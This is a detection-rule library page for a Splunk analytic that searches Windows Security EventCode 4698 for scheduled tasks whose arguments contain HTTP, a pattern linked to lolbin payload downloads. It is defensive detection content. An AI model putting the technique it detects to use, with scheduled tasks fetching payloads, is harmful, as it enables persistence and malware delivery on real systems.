← Library
splApache-2.0from splunk/security_content

Schedule Task with HTTP Command Arguments

The following analytic detects the creation of scheduled tasks on Windows systems that include HTTP command arguments, using Windows Security EventCode 4698. It identifies tasks registered via schtasks.exe or TaskService with HTTP in their command arguments. This behavior is significant as it often indicates malware activity or the use of Living off the Land binaries (lolbins) to download additional payloads. If confirmed malicious, this activity could lead to data exfiltration, malware propagation, or unauthorized access to sensitive information, necessitating immediate investigation and mitigation.

Quality
67
FP risk
Forks
0
Views
0
Rule sourcedetections/endpoint/schedule_task_with_http_command_arguments.yml
`wineventlog_security` EventCode=4698
  | xmlkv Message
  | search Arguments IN ("*http*")
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest, Task_Name, Command,
       Author, Enabled, Hidden,
       Arguments
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `schedule_task_with_http_command_arguments_filter`